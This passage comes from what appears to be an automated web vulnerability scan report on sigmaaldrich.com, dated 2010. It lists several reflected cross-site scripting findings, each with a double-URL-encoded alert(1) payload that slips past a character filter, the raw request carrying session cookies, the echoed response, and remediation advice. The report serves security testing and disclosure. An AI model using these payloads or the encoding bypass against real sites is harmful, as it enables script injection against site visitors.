WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:02 GMT
Content-Length: 28950
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/site-level/corporate405ea";alert(1)//37b0ed6cdf1/business-development.html","E404") ;
   </script>
...[SNIP]...

1.627. http://www.sigmaaldrich.com/site-level/corporate/business-development.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /site-level/corporate/business-development.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ac18%2522%253balert%25281%2529%252f%252f23d3c813656 was submitted in the REST URL parameter 3. This input was echoed as 9ac18";alert(1)//23d3c813656 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site-level/corporate/9ac18%2522%253balert%25281%2529%252f%252f23d3c813656 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:04 GMT
Content-Length: 28925
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/site-level/corporate/9ac18";alert(1)//23d3c813656","E404") ;
   </script>
...[SNIP]...

1.628. http://www.sigmaaldrich.com/site-level/corporate/investor-relations.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /site-level/corporate/investor-relations.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13634%2522%253balert%25281%2529%252f%252f32b9ba8d555 was submitted in the REST URL parameter 1. This input was echoed as 13634";alert(1)//32b9ba8d555 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site-level13634%2522%253balert%25281%2529%252f%252f32b9ba8d555/corporate/investor-relations.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:58 GMT
Content-Length: 28948
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/site-level13634";alert(1)//32b9ba8d555/corporate/investor-relations.html","E404") ;
   </script>
...[SNIP]...

1.629. http://www.sigmaaldrich.com/site-level/corporate/investor-relations.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /site-level/corporate/investor-relations.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1235%2522%253balert%25281%2529%252f%252f0b7e4887d8a was submitted in the REST URL parameter 2. This input was echoed as b1235";alert(1)//0b7e4887d8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site-level/corporateb1235%2522%253balert%25281%2529%252f%252f0b7e4887d8a/investor-relations.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:59 GMT
Content-Length: 28948
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/site-level/corporateb1235";alert(1)//0b7e4887d8a/investor-relations.html","E404") ;
   </script>
...[SNIP]...

1.630. http://www.sigmaaldrich.com/site-level/corporate/investor-relations.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /site-level/corporate/investor-relations.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c6a3%2522%253balert%25281%2529%252f%252f7559b22080c was submitted in the REST URL parameter 3. This input was echoed as 3c6a3";alert(1)//7559b22080c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site-level/corporate/3c6a3%2522%253balert%25281%2529%252f%252f7559b22080c HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:01 GMT
Content-Length: 28925
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/site-level/corporate/3c6a3";alert(1)//7559b22080c","E404") ;
   </script>
...[SNIP]...

1.631. http://www.sigmaaldrich.com/site-level/corporate/worldwide-offices.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /site-level/corporate/worldwide-offices.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e3b7%2522%253balert%25281%2529%252f%252ffa9c6485d2b was submitted in the REST URL parameter 1. This input was echoed as 6e3b7";alert(1)//fa9c6485d2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site-level6e3b7%2522%253balert%25281%2529%252f%252ffa9c6485d2b/corporate/worldwide-offices.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
